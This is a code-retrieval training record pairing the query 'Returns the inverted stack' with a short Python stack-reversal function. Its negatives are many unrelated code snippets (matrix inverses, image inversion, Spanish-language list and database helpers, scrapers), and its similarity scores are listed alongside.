[ "0.62369305", "0.5968242", "0.5968242", "0.5929463", "0.5875082", "0.5795964", "0.574635", "0.57377017", "0.56929976", "0.566961", "0.5612241", "0.5606185", "0.5604151", "0.55805415", "0.55805415", "0.5572482", "0.555679", "0.5539605", "0.5539363", "0.5522629", "0.55216", "0.5502805", "0.5500729", "0.5494472", "0.5476412", "0.547567", "0.54575396", "0.54571426", "0.5414721", "0.5413411", "0.5403159", "0.5395007", "0.5390921", "0.538678", "0.53858864", "0.53803855", "0.5359159", "0.5351229", "0.53297687", "0.52979463", "0.52803993", "0.52791303", "0.5279097", "0.5275243", "0.52733624", "0.52677566", "0.52608407", "0.52383065", "0.5235578", "0.52286077", "0.5217836", "0.520704", "0.5197743", "0.5188273", "0.518722", "0.5186829", "0.5182565", "0.5181358", "0.5170608", "0.5129843", "0.51250803", "0.5118556", "0.5110356", "0.51101696", "0.5109262", "0.51089084", "0.51063704", "0.5105948", "0.50975096", "0.5096495", "0.50912434", "0.50855166", "0.5078298", "0.50738776", "0.50717294", "0.5070376", "0.50662875", "0.50654304", "0.5063011", "0.50610554", "0.5059223", "0.5054305", "0.5054033", "0.50510144", "0.50507355", "0.5046151", "0.50412935", "0.5040632", "0.5040632", "0.50334966", "0.50330347", "0.5032129", "0.50301397", "0.5023303", "0.5022693", "0.5022614", "0.50213677", "0.50162494", "0.5014721", "0.500955" ]
0.6678378
0
Show all elements in the stack
def barrido(pila):
    paux = Pila()
    while not pila_vacia(pila):
        dato = desapilar(pila)
        print(dato)
        apilar(paux, dato)
    while not pila_vacia(paux):
        apilar(pila, desapilar(paux))
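The document above is this query's positive match: a non-destructive stack sweep that prints every element and then rebuilds the stack from an auxiliary one. The row shows only the traversal itself, so the list-backed Pila class and the apilar/desapilar/pila_vacia helpers below are assumptions supplied purely to make the sketch run standalone:

    # Minimal, self-contained sketch; Pila and its helpers are assumptions,
    # since the dataset row ships only the traversal function.
    class Pila:
        """LIFO stack backed by a plain Python list."""
        def __init__(self):
            self.datos = []

    def apilar(pila, dato):
        """Push dato onto the top of the stack."""
        pila.datos.append(dato)

    def desapilar(pila):
        """Pop and return the element on top of the stack."""
        return pila.datos.pop()

    def pila_vacia(pila):
        """Return True when the stack holds no elements."""
        return len(pila.datos) == 0

    def barrido(pila):
        # Restated from the row above so the sketch runs on its own:
        # pop-and-print everything, then pour the auxiliary stack back
        # so the original contents and order are preserved.
        paux = Pila()
        while not pila_vacia(pila):
            dato = desapilar(pila)
            print(dato)
            apilar(paux, dato)
        while not pila_vacia(paux):
            apilar(pila, desapilar(paux))

    # Usage: prints 3, 2, 1 (top of stack first) and leaves p unchanged.
    p = Pila()
    for n in (1, 2, 3):
        apilar(p, n)
    barrido(p)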
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
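The metadata block above declares the training objective for this row: a triplet of (query, document, negatives), with the self and paired objectives left empty. Purely as an illustrative sketch, assuming nothing beyond the field names shown (the dataset ships no training code, and iter_triplets is a hypothetical helper), one row could be expanded into anchor/positive/negative tuples like so:

    # Hypothetical helper, not part of the dataset: expand one row into
    # (anchor, positive, negative) triplets per the declared objective.
    def iter_triplets(row):
        for negative in row["negatives"]:
            yield (row["query"], row["document"], negative)

Each query would then be contrasted against its one positive document and every retrieved negative in turn.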
[ "def list(self):", "def listar_gabarito():\n return GabaritoProva.listar(gabarito)", "def listadoServicio(listServicios,codigoReserva):\n try:\n if(codigoReserva!=\"\"):\n variables.listado = listar(codigoReserva)\n listServicios.clear()\n for registro in variables.listado:\n listServicios.append(registro)\n except Exception as e:\n print(\"error en cargar treeview servicios\")\n print(e)", "def list():", "def list():", "def elems(self):", "def on_btnLista_clicked(self,guardar):\n XerarInformes()", "def items(self):", "def items():", "def Leer_Pila(self, *elementos):\n for k in elementos:\n self.Push(k)", "def listar_cadastros():\n return cadastro_alunos.listar_aluno()", "def listaNacionalidades():\n nac = NacionalidadModel()\n\n return nac.listarTodos()", "def Obtener_Lista(self):\n\t\treturn [self,self.Nombre+\" \"+self.Apellido,self.ID,self.Fecha, \n\t\tself.Edad,self.Test,self.Posicion,self.Prioridad,self.Progreso,self.Informe]", "def get_element_list(self):\n pass", "def updateLstAllElement(self):\n self.lstAllElement=[self.idVet, self.libelle,self.marque,self.quantite,self.prixHTVA,self.tauxTVA,self.taille,self.categorie,self.couleur,self.lstAssorti]", "def obtener_productos():\n\n # Se crea la lista de objetos Producto()\n productos = [\n Producto(\"Caja chica\", 5, 100.0),\n Producto(\"Caja mediana\", 3, 185.0),\n Producto(\"Caja grande\", 1, 299.0)\n ]\n\n return productos", "def listaSangre():\n san = SangreModel()\n\n return san.listarTodos()", "def obter_lista_arquivos(self):\n if os.path.exists(self.caminho):\n return [arq for arq in self.obter_lista_conteudo() \\\n if os.path.isfile(arq)]\n else:\n return []", "def select_todos_registros(nome_tabela: str) -> list:\n query = f'SELECT * FROM {nome_tabela};'\n\n lista_registros = banco_operacoes(query)\n\n return lista_registros", "def list(self, *args):\n return []", "def apilar(self,dato):\r\n\t\tself.elementos.append(dato)\r\n\t\tself.len += 1", "def consultar_todos_DB(self):\n registros = db.session.query(ModelConcurso).all()\n for registro in registros:\n print(registro)", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def _setup():\n for item in dominos:\n queue.append([item])", "def items(self) -> List:\n pass", "def todos(self):\n socios = session.query(Socio).all()\n return socios", "def __init__(self):\n mi_parqueo = list()", "def __init__(self, nombre_depto, id_depto):\n self.nombre_depto = nombre_depto\n self.id_depto = id_depto\n self.empleados = []", "def listadohab(listhab):\n try:\n variables.listado = listarhab()\n variables.listhab.clear()\n for registro in variables.listado:\n listhab.append(registro)\n except:\n print(\"error en cargar treeview de hab\")", "def listadohab(listhab):\n try:\n variables.listado = listarhab()\n variables.listhab.clear()\n for registro in variables.listado:\n listhab.append(registro)\n except:\n print(\"error en cargar treeview de hab\")", "def list_all_tags(self,obs):", "def listar(self):\n conn = None\n\n try:\n params = config()\n conn = psycopg2.connect(**params)\n cur = conn.cursor()\n cur.execute(\"SELECT id_aluno, nome_aluno, cpf_aluno, data_nasc_aluno, telefone_aluno FROM Alunos\")\n\n # Imprime o número de alunos cadastrados.\n print(f\"\\nHá {cur.rowcount} aluno(s) cadastrado(s): \")\n row = cur.fetchone()\n\n while row is not None:\n print(f\"\\nID: {row[0]}\\nNome: {row[1]}\\nCPF: {row[2]}\\nData de Nascimento: {row[3].strftime('%d/%m/%Y')}\\nTelefone: {row[4]}\\n\")\n row = cur.fetchone()\n \n cur.close()\n\n except (Exception, psycopg2.DatabaseError) as 
error:\n print(error)\n \n finally:\n if conn is not None:\n conn.close()", "def getItemsInDialog(elm):\n items = []\n items.extend(getAllChildrenWithTagName(elm, \"control\"))\n return items", "def cambiar_Fichas(self,lista):\n self.rellenar_atril()\n for letra in lista:\n self.bolsa.agregar_bolsa(letra, 1)\n random.shuffle(self.bolsa.bolsa)", "def _get_elements(cls):\n raise NotImplementedError()", "def find_all(self):", "def objects(self):", "def obtener_comentarios(idActividad):\n comentarios = Comentario.objects.filter(idactcomentario=idActividad)\n lista = []\n for elem in comentarios:\n lista.append(elem)\n return lista", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def listar_proyectos(request):\n proyectos = Proyecto.objects.all()\n PROYECTOS_USUARIO= CantProyectos(request)\n cant = len(PROYECTOS_USUARIO)\n context={\n 'proyectos':proyectos,###### TODOS LOS PROYECTOS\n 'list': PROYECTOS_USUARIO,##PROYECTOS DEL USUARIO LOS CUAL SE DEBE MOSTRAR, SOLO ID\n 'cant': cant####CANTIDAD DE PROYECTOS QUE POSEE\n }\n return render(request, 'Menu/listar_proyectos.html', context)", "def getList(self):", "def getList(self):", "def all(self):", "def all(self):", "def list_all(self):\n\n url = 'equipamento/list/'\n\n code, xml = self.submit(None, 'GET', url)\n\n return self.response(code, xml)", "def get_all_menu():", "def hacer_alineamiento(lista_nombres):\n \n archivos_muscle=[]\n for i in lista_nombres:\n alinea = ['muscle','-in',i,'-out',(i+\"_alinea_muscle\")]\n hacer=Popen(alinea,stdout = PIPE)\n hazlo=hacer.stdout.read()\n hacer.stdout.close()\n archivos_muscle.append(i+\"_alinea_muscle\")#El nombre del archivo del alineamiento será el obtenido\n #en parsear seguido _alinea_muscle\n \n return archivos_muscle", "def listaProfesion():\n prof = ProfesionModel()\n\n return prof.listarTodos()", "def _get_all_elems(self, protein_id: int):\n path_protein, _ = self._get_path(protein_id)\n try:\n # mol_pocket = Molecule(path_protein)\n mol_protein = Molecule(path_protein)\n mol_protein.filter('protein')\n if (self.type_feature == \"bio_properties\" or self.type_feature == \"bio_all_properties\"):\n mol_protein = prepareProteinForAtomtyping(mol_protein, verbose = False)\n mol_pocket_element = mol_protein.element\n except FileNotFoundError:\n print(protein_id, \" exception\")\n path_protein, path_lig = self._get_path(2)\n mol_pocket = Molecule(path_protein)\n mol_pocket_element = mol_pocket.element\n return mol_pocket_element", "def __init__(self):\n self.liste = []", "def __init__(self):\r\n self.lis = []", "def AllSubElements(self):\n return []", "def getListOfAllElements(self, *args):\n return _libsbml.SBasePlugin_getListOfAllElements(self, *args)", "def busqueda_por_atributo(self, atributo, valor):\n\n paquetes = []\n\n if atributo == \"Número de dormitorios\":\n for casa in self.casas:\n if casa.numero_dormitorios >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Número de baños\":\n for casa in self.casas:\n if casa.numero_banos >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Numero de cocinas\":\n for casa in self.casas:\n if casa.numero_cocinas >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)", "def elems(self):\n pass", "def _get_elements(self):\n return self._elements", "def __init__(self):\n\n self.notas = []", "def __local_pe(soup):\n news = []\n list_items = soup.find('div', class_='maisVistas').find_all(\n 'li', class_='texto')\n\n for li in 
list_items:\n title = li.a.string\n link = li.a['href']\n news.append(dict(title=title, link=link))\n return news", "def list(\n self,\n name,\n ):\n pass", "def get_elements(self):\n return self.elements", "def __local_pe(soup):\n news = []\n list_items = soup.find('div', class_='maisVistas').find_all('li', class_='texto')\n\n for li in list_items:\n title = li.a.string\n link = li.a['href']\n news.append(dict(title=title, link=link))\n return news", "def carregar_contatos(self):\r\n self.clientes = []\r\n fornecedor = SistemaFornecedor()\r\n fornecedor.carregar_arquivo('')\r\n for contato in fornecedor.fornecedores:\r\n self.adicionar_cliente(contato.nome, '', [contato.telefone], [contato.email], empresa='')\r\n return len(self.clientes)", "def get_items(self):\n return []", "def returnIdDadosPessoais(self):\r\n self.cursor.execute(\"SELECT DOCUMENTO FROM DADOS_PESSOAIS;\")\r\n self.__result = self.cursor.fetchall()\r\n self.__lista = []\r\n try:\r\n for self.__i in self.__result:\r\n self.__lista.append(self.__i[0])\r\n return self.__lista\r\n except:\r\n return []", "def send_command_to_all(self, comando, parametros=None):\n for usuario in self.clientes.copy():\n self.send_command(comando, usuario, parametros)", "def obter_lista_sub_pastas(self):\n ##TO DO: não retornar links para arquivos\n if os.path.exists(self.caminho):\n return [arq for arq in self.obter_lista_conteudo() \\\n if not os.path.isfile(arq)]\n else:\n return[]", "def cargarObras(self):\n self.cargarObjetos(self.tableOs,\n ObraSocialModel.buscarTodos(\"razon_social\", self.sesion).all(),\n (\"razon_social\", \"cuit\", \"direccion\")\n )", "def obtenir_joueurs(self, tournoi):\n i = 1\n for x in range(0, NOMBRE_JOUEURS):\n # collect player via view\n infos = self.vue.demander_info_joueur(i)\n joueur = Joueur(infos)\n # add to the list of players\n tournoi.enregistrer_joueur(joueur)\n i += 1", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def _elements(self):\n return list(islice(self.generate(), None))", "def get_elements(cls, m):\n raise NotImplementedError", "def find_all(self):\n pass", "def get_all(self):\n list = []\n line = self.get()\n while line:\n list.append(line)\n line = self.get()\n return list", "def get_listu_postaja(self):\n popis = sorted(list(self.postaje))\n return popis", "def __init__(self):\n self.tiempos = ListaEnlazada() # Marcas de tiempo\n self.tracks = [] # Lista de tracks", "def get_all() -> list:\n categorias = []\n conn = GenericDao.connect()\n cursor = conn.execute(\"SELECT * FROM categorias\")\n for row in cursor:\n categoria = Categoria(row[1], row[0])\n categorias.append(categoria)\n if debug:\n print(str(categoria))\n\n conn.close()\n return categorias", "def iter(self):\n return []", "def test_3_listautor(self): \n [i for i in self.app._listarAutores()]\n self.app.getAutores()", "def listar(channel, where, ebrios):\n if ebrios[where]:\n response = 'Los que se coparon en ' + where + ':'\n for ebrio in ebrios[where]:\n response += '\\n' + vos_quien_sos(ebrio) + ''\n else:\n response = 'No hay after armado en ' + where + \\\n ', podrías armar uno <@' + user + 
'>'\n postea(channel, response)", "def getElements(self):\n\telements = self.listFolderContents() \n\treturn elements", "def all(cls):\n return []", "def get_all_products(self):\n\t\tpass", "def __armar_podio(self, participantes):\n podio = []\n \n while len(podio) < 3:\n participante_mejor_puntaje = self.__calcular_disparo_ganador(participantes)\n podio.append(participante_mejor_puntaje)\n for disparo in participantes:\n if disparo['puntaje_total'] == participante_mejor_puntaje['puntaje_total']:\n participantes.remove(disparo)\n return podio", "def generar_poblacion():\n poblacion = []\n ind = Arbol()\n for i in range(size_pop):\n poblacion.append(generar_individuo_recursivo(ind))\n return poblacion", "def getListOfAllElementsFromPlugins(self, *args):\n return _libsbml.SBase_getListOfAllElementsFromPlugins(self, *args)", "def bloquear_todo(mapa):\n \n for e in mapa.mapa:\n mapa.alternar_bloque(e)", "def __bol(soup):\n news = []\n anchors = soup.find(\n 'div', class_='mais-clicadas-lista link-primary').find_all('a')\n\n for a in anchors:\n title = a.find('span', class_='mais-clicadas-item-content').text\n link = a['href']\n news.append(dict(title=title, link=link))\n return news", "def abrir(self):\n assert self.open == False\n self.ne = [n for n in self.ne]\n self.je = [e1 for e1 in self.je]\n self.ie = []\n self.open = True", "def podruhe():\n mylist = [x for x in range(3)]\n for element in mylist:\n print element", "def elements(self):\n return self.q", "def _list(self):\n raise NotImplementedError", "def test_listes():\n listes = [Liste(mot) for mot in (\"SE\", \"PAS\", \"DE\", \"DEVIS\")]\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[0] apres liste[1], puis un mot vide\")\n listes[1].suffixe(listes[0])\n listes[1].suffixe(Liste(\"\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[1] apres listes[2] et listes[0] apres listes[3]\")\n listes[2].suffixe(listes[1])\n listes[3].suffixe(listes[0])\n data_tycat(listes)\n _ = input()\n print(\"on efface 'DEVIS'\")\n del listes[3]\n data_tycat(listes)\n _ = input()\n # # test dans le cas où le doublage ne se fait pas à la tête de la liste\n # print(\"on efface 'DEPASSE'\")\n # del listes[2]\n # data_tycat(listes)\n # _ = input()\n print(\"on ajoute 'NT' apres 'PASSE'\")\n listes[1].suffixe(Liste(\"NT\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute 'SE' apres elle-meme\")\n listes[0].suffixe(listes[0])\n data_tycat(listes)\n # # supression de SE\n # _ = input()\n # print(\"on efface 'SE'\")\n # del listes[0]\n # data_tycat(listes)", "def clear_elements(self):\n\n pass", "def get_all(self,empty=True):\n with self.lock:\n items = self.items\n if empty: self.items = []\n return items", "def consultI(listaI): # Esta sección fue hecha por Ángel\n for fila in listaI:\n print(\"\\n\")\n for elemento in fila:\n print(elemento + \"\\t\",end = \"\")", "def get_products(self):\n\n lst = []\n for product in self.products.findall('product'):\n id = product.find('id').text\n name = product.find('name').text\n dispensary_id = product.find('dispensary_id').text\n dispensary_name = product.find('dispensary_name').text\n canabis_brand = product.find('canabis_brand').text\n canabis_strain = product.find('canabis_strain').text\n category = product.find('category').text\n subcategory = product.find('subcategory').text\n thc_level = product.find('thc_level').text\n cbd_level = product.find('cbd_level').text\n cbn_level = product.find('cbn_level').text\n thc_level_type = product.find('thc_level_type').text\n cbd_level_type = 
product.find('cbd_level_type').text\n cbn_level_type = product.find('cbn_level_type').text\n\n description = product.find('description').text\n created_at = product.find('created_at').text\n updated_at = product.find('updated_at').text\n\n prices = []\n urls = []\n images = []\n\n for child in product:\n if child.tag == 'prices':\n for cost in child.findall('cost'):\n prices.append(Price(cost.attrib['unit'], cost.text))\n\n if child.tag == 'urls':\n admin = child.find('admin').text\n public = child.find('public').text\n urls.append(UrlInfo(admin, public))\n\n if child.tag == 'images':\n for image in child.findall('image'):\n images.append(Image(image.attrib['main'], image.text,))\n\n lst.append(Product(id, name, dispensary_id, dispensary_name,\n canabis_brand, canabis_strain,\n category, subcategory, thc_level, cbd_level,\n cbn_level, thc_level_type, cbd_level_type,\n cbn_level_type, prices, urls, images,\n description, created_at, updated_at))\n\n return lst", "def creaLE(venta): #Esta sección fue hecha por Ángel\n listaPGA = [] # Esto genera la lista necesaria para pasarlo al archivo\n for elemento in venta:\n listaN = elemento[0] + \",\"\n listaN += str(elemento[1]) + \"\\n\"\n listaPGA.append(listaN)\n return listaPGA", "def find_elements(self, elements: List[WebElement]) -> List[WebElement]:\n return elements", "def scraper_lista_articoli(LINK_SOS_FANTA: str) -> list:\n soup = BeautifulSoup(requests.get(LINK_SOS_FANTA).text, \"html.parser\")\n body = soup.find(class_=\"widget-content\")\n titoli = body.find_all(\"li\") # lista di tutti gli articoli\n\n to_scrape = []\n for post in titoli:\n # parsing della data in italiano, devo pulirla\n data_pubblicazione = (\n post.find(class_=\"post-meta\").text.replace(\"del\", \"\").replace(\"alle\", \"\")\n )\n parsed_data = dateparser.parse(data_pubblicazione, languages=[\"it\"])\n\n # solo ultimi 4 giorni, se ne trovo uno vecchio esco dal loop\n if parsed_data < datetime.now() - timedelta(days=4):\n return to_scrape\n\n # aggiungo link\n link = post.find(\"a\", href=True)\n to_scrape.append(link[\"href\"])\n\n # caso post \"a scheda\": sono divisi in categorie, aggiungo link multipli\n post_multipli = {\"PORTIERI\": 3, \"ATTACCO\": 8}\n for caso in post_multipli.keys():\n if caso in link[\"title\"]:\n # la struttura della pagina sarà link/1/, link/2/ etc..\n for i in range(post_multipli.get(caso)):\n to_scrape.append(link[\"href\"] + f\"{i}/\")\n return to_scrape", "def getItemsInContainer(elm):\n items = []\n items.extend(getAllChildrenWithTagName(elm, \"action\"))\n items.extend(getAllChildrenWithTagName(elm, \"container\"))\n switches = getAllChildrenWithTagName(elm, \"switch\")\n for sw in switches:\n items.extend(getAllChildrenWithTagName(sw, \"action\"))\n items.extend(getAllChildrenWithTagName(sw, \"container\"))\n return items" ]
[ "0.6206592", "0.6027048", "0.60082996", "0.5969509", "0.5969509", "0.5953642", "0.5931115", "0.58567864", "0.5827238", "0.5822924", "0.5788263", "0.5785534", "0.578256", "0.57585746", "0.5745181", "0.57410586", "0.5723462", "0.57228816", "0.56660974", "0.5607361", "0.5586085", "0.5582145", "0.55717856", "0.55658436", "0.5565693", "0.5552789", "0.55487347", "0.55457777", "0.5544971", "0.5544971", "0.55161697", "0.55011433", "0.5496019", "0.5461866", "0.54602605", "0.544918", "0.54358995", "0.5424959", "0.54167145", "0.5407721", "0.5406398", "0.5406398", "0.5389742", "0.5389742", "0.53824353", "0.5376591", "0.5360513", "0.5358852", "0.5358427", "0.53572756", "0.532748", "0.5322413", "0.5307969", "0.52971476", "0.5296181", "0.52920514", "0.5290406", "0.52892023", "0.5287323", "0.5286989", "0.5285555", "0.52803636", "0.5278413", "0.5272213", "0.5265613", "0.5264786", "0.52481985", "0.5242411", "0.523939", "0.523939", "0.52349114", "0.52331007", "0.5230684", "0.5228635", "0.5228371", "0.5227485", "0.5224506", "0.522105", "0.52207285", "0.5212097", "0.52102625", "0.5209215", "0.52090645", "0.5202283", "0.52003974", "0.519818", "0.51955664", "0.51890385", "0.51822", "0.51673275", "0.5166427", "0.5165206", "0.5165181", "0.51633286", "0.5150986", "0.5150877", "0.5150189", "0.5146393", "0.51429224", "0.5140543", "0.5132243" ]
0.0
-1
Returns the inverted stack
def invertir(pila1):
    # Pop every element from pila1 and push it onto pila2,
    # so pila2 ends up holding the elements in reverse order.
    pila2 = Pila()
    while not pila_vacia(pila1):
        apilar(pila2, desapilar(pila1))
    return pila2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __invert__(self):\n return self.inverse()", "def inverse(self, x, y):", "def __invert(self, args):", "def invert(self,el):\n return el^(self.q-2)", "def invert(self):\n tmp = self.pvt\n self.pvt = self.nvt\n self.nvt = tmp\n tmp = self.pFace\n self.pFace = self.nFace\n self.nFace = tmp", "def inverse(self):\n def inv(v):\n v[0], v[1] = v[1] , v[0]\n for v in [self.point1 , self.pointN , self.unitv, self.normalv]:\n inv(v)\n\n self.points = numpy.roll(self.points,1,axis=1)\n self.a, self.b = self.b, self.a\n self.angle = numpy.arccos( self.unitv[0] )*numpy.sign(self.unitv[1] )\n return", "def invert(self):\n raise NotImplementedError()", "def scale_invert(self):", "def invert(self, img):\n return self.inverse()(img)", "def inverse(self):\n return self.invert()", "def __invert__(self):\n a = self.angle\n x, y = Vector.cartesian([1, a])\n return Vector(x, y)", "def modular_inverse(self):\n i = gmpy2.invert(self.c2, self.n)\n mx = pow(self.c1, self.a, self.n)\n my = pow(i, int(-self.b), self.n)\n self.m= mx * my % self.n", "def __invert__(self):\r\n return 1 - self", "def __invert__(self):\n return self.reverse()", "def flip(self, p):\n return -p", "def flip(self):", "def invert(x):\n return linalg.inv(x)", "def invert(self):\n self._c = ~self._c", "def invert (y):\n\n if eq(y,pos) : return y\n elif lt(y,nil) : return neg(invert(neg(y)))\n elif eq(y,nil) : raise ZeroDivisionError()\n yl,yr = split(y)\n il = nil\n ir = None\n r = None,None\n iyr,iyl = None,None\n width = 0\n while (il or ir) and width < 3:\n width += 1\n nl = nr = None\n if il is not None:\n r = (il,r[1])\n if yr is not None:\n if iyr is None:\n #iyr = ~yr\n iyr = invert(yr)\n left = mul(mul(add(pos,sub(yr,y)),il),iyr)\n if r[0] is None or gt(left,r[0]):\n nl = left\n if yl is not None and not le(yl,nil):\n if iyl is None:\n #iyl = ~yl\n iyl = invert(yl)\n right = mul(mul(add(pos,sub(yl,y)),il),iyl)\n if r[1] is None or lt(right,r[1]):\n nr = right\n if ir:\n r = (r[0],ir)\n if yl is not None and not le(yl,nil):\n if iyl is None:\n #iyl = ~yl\n iyl = invert(yl)\n left = mul(mul(add(pos,sub(yl,y)),ir),iyl)\n if r[0] is None or (gt(left,r[0]) and (not nl or gt(left,nl))):\n nl = left\n if yr is not None:\n if iyr is None:\n #iyr = ~yr\n iyr = invert(yr)\n right = mul(mul(add(pos,sub(yr,y)),ir),iyr)\n if r[1] is None or (lt(right,r[1]) and (not nr or lt(right,nr))):\n nr = right\n il,ir = nl,nr\n #print(r)\n if r[0] is None: r = (0,r[1])\n if r[1] is None: r = (r[0],0)\n return join(*r)", "def __invert__(self):\n return BitBoard(~self.num)", "def __invert__(self):\r\n if self.field.characteristic == 2:\r\n return runtime.invert(self)\r\n\r\n return super().__invert__()", "def __invert__(self):\n return self.fam.c_unop('invert', self)", "def opposite(direction):\n return (direction+2)%4", "def __invert__(self) -> Operators:\n return self.operate(inv)", "def invert(self):\n self.vertices.reverse()", "def __invert__(self):\n \n return Vector(-self.y, self.x)", "def __invert__(self):\n return self.negated()", "def __invert__(self):\n return self.__neg__()", "def __invert__(self):\n return Factorization([(p,-e) for p,e in reversed(self)],\n cr=self._cr(), unit=self.unit()**(-1))", "def inv(self):\n return self.conjugate()", "def _r_inv(self):\n raise NotImplementedError", "def inv_inplace(a):", "def inverse_transform(v):\n v, k = divmod(v - 1, N)\n v, j = divmod(v, N)\n v, i = divmod(v, N)\n return i, j, k", "def __invert__(self):\r\n return self.__class__(self._real, -self._imag)", "def revise():", "def inverse(self) -> 
'Invertible':\n raise NotImplementedError", "def __invert__(self):\n a = self.array_form\n n = len(a)\n inv_form = [0] * n\n for i in xrange(n):\n inv_form[a[i]] = i\n return _new_from_array_form(inv_form)", "def _inv(self) -> None:\n\n self.inv(inplace=True)", "def lr_flip(self):\n for g in self.grid:\n g.reverse()", "def invert(self, transformed_input):\n return transformed_input * self.__diff + self.low", "def _invert(G):\n return Surreal.from_value(1 / G._n)", "def invert_inplace(a):", "def inverse(self):\n return ~self", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def support_inverse(rho):\n return LA.pinv(rho)", "def __invert__(self):\n return self.wc", "def __invert__(self):\n return self.wc", "def invert(self):\n return self._invert", "def invert_L2_wdls():\n print()", "def inverse(im): \t \n x,y = np.shape(im)\n img = np.zeros([x,y])\n\t\n for i in range(x):\n for j in range(y):\n img[i,j] = 255 - im[i,j]\n return img", "def _get_inv(self):\n m,d = self.B.shape\n Im = np.eye(m)\n Id = np.eye(d)\n BBt = self.B@self.B.T\n I_BBt_inv = np.linalg.pinv(Im + BBt)\n \n return (1/self.alpha)*(Id - self.B.T@( I_BBt_inv@self.B/self.alpha))", "def inverse(self):\n return self._inverse", "def __invert__(self):\n try:\n B = ~(self.matrix())\n except ZeroDivisionError:\n raise ZeroDivisionError(\"matrix morphism not invertible\")\n try:\n return self.parent().reversed()(B)\n except TypeError:\n raise ZeroDivisionError(\"matrix morphism not invertible\")", "def invert(self, transformed_input):\n raise NotImplementedError()", "def test_inverse_transform(self):", "def opposite(x):\n return -1*x", "def __invert__(self) -> PointType:\n return Point(~self.x, ~self.y)", "def inv(self, y):\n pass", "def inverted( self ):\n return self._modifier(\n self,\n lambda x: invert_bits( x, self.nr_of_pins )\n )", "def inverse_transform(self, y: Array2D) -> Array2D:", "def inverse(self: T) -> T:", "def inverse_el(el: Fp, p: int) -> Fp:\n return pow(int(el), p-2, p)", "def inv(P):\n L = cho_factor(P)\n return cho_solve(L, np.eye(P.shape[0]))", "def invert( self ) :\n\n series_ = self.copy( )\n for l in xrange( 1, len( series_ ), 2 ) : series_.coefficients[l] *= -1\n return( series_ )", "def pseudoInversa(J):\n\tJinv = np.linalg.pinv(J)\n\treturn Jinv", "def invert(self) -> Frame:\n return Inverse(self)", "def invert(self):\n\t\tself.bitmap_data = \"\".join([chr(255-ord(x)) for x in self.bitmap_data])\n\t\treturn self", "def invert(array):\n\n f = [1, 1, 1]\n\n result = np.array(array)\n\n for row in range(result.shape[0]):\n for pixel in range(result.shape[1]):\n result[row][pixel] = f - result[row][pixel]\n\n return result", "def inverse(self):\r\n \r\n Mi=mat4()\r\n d=self.determinant()\r\n for i in range(4):\r\n for j in range(4):\r\n sign=1-((i+j)%2)*2\r\n m3=self._submat(i,j)\r\n Mi[j,i]=sign*m3.determinant()/d\r\n return Mi", "def invert(self, a, b):\n raise NotImplementedError", "def inverse(self, point):\n raise NotImplementedError('The Lie group inverse is not implemented.')", "def inv(self):\n\t\tdeterminant = self.det()\n\t\tif determinant:\n\t\t\treturn self.adj() / determinant\n\t\telse:\n\t\t\traise ValueError(\"Not Invertible\")", "def inverse(self):\n n = self.norm()\n c = self.conj()\n d = 1.0 / (n * n)\n c.scale(d)\n return c", "def complex_inverse(c1,cr):", "def invert_var(self):\n return 1./self.var", "def inverse_modulo_p(a, p):\n 
prime = p\n \n while a < 0:\n a += prime\n \n y1 = 1\n y2 = 0\n \n while a != 1:\n q = (p // a) % prime\n # use of integer division // speeded algorithm up by huge factor\n \n # save temporary values\n tmp_a = a\n tmp_y2 = y2\n # compute all these simultaneously\n a = (p - (q*a)) % prime\n p = tmp_a\n y2 = y1\n y1 = (tmp_y2 - (q*y1)) % prime\n \n return y1 % prime", "def protrudes((u,v)):\r\n return ((u,v,W), (u,v,S), (u,v-1,W), (u-1,v,S))", "def inv_m(self):\n self.m = -self.m", "def inv(q):\n return q * np.array([-1,-1,-1,1]) / amplitude(q) ** 2", "def __invert__(cls):\n try:\n return cls.__inverse__\n except:\n # TODO: more descriptive\n raise err.VinoError('no inverse class was set')", "def inverse( self ):\r\n\t\treturn fraction( self.denominator, self.numerator )", "def invgeochart(w):\n # u = torch.asin(w[...,2])\n u = torch.acos(w[...,2])\n # v = torch.acos(w[...,0]/torch.cos(u))\n v = torch.atan(w[...,1]/w[...,0])\n return torch.stack((u,v+np.pi))", "def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]:\n return [[1- x for x in reversed(row)] for row in A]", "def inv(self):\n\n self.x, self.y = self.y, self.x\n self._x_, self._y_ = self._y_, self._x_\n self.xfac, self.yfac = 1 / self.yfac, 1 / self.xfac\n self._xfac_, self._yfac_ = 1 / self._yfac_, 1 / self._xfac_\n self._u = 1 / self._u.conj()", "def mod_inverse(a, n):\n \n b = n\n if abs(b) == 0:\n return (1, 0, a)\n\n x1, x2, y1, y2 = 0, 1, 1, 0\n while abs(b) > 0:\n q, r = divmod(a, b)\n x = x2 - q * x1\n y = y2 - q * y1\n a, b, x2, x1, y2, y1 = b, r, x1, x, y1, y\n\n return x2 % n", "def inverse(self):\n data = np.linalg.inv(self._data)\n return self.create(self.rows, self.cols, data)", "def inverse(series):\n\n result = 1 / series\n result.name = 'inv ({})'.format(series.name)\n\n return result", "def modular_inverse(a, mod):\n r_prev, u_prev, v_prev, r, u, v = a, 1, 0, mod, 0, 1\n while r != 0:\n q = r_prev // r\n r_prev, u_prev, v_prev, r, u, v = (\n r,\n u,\n v,\n r_prev - q * r,\n u_prev - q * u,\n v_prev - q * v,\n )\n 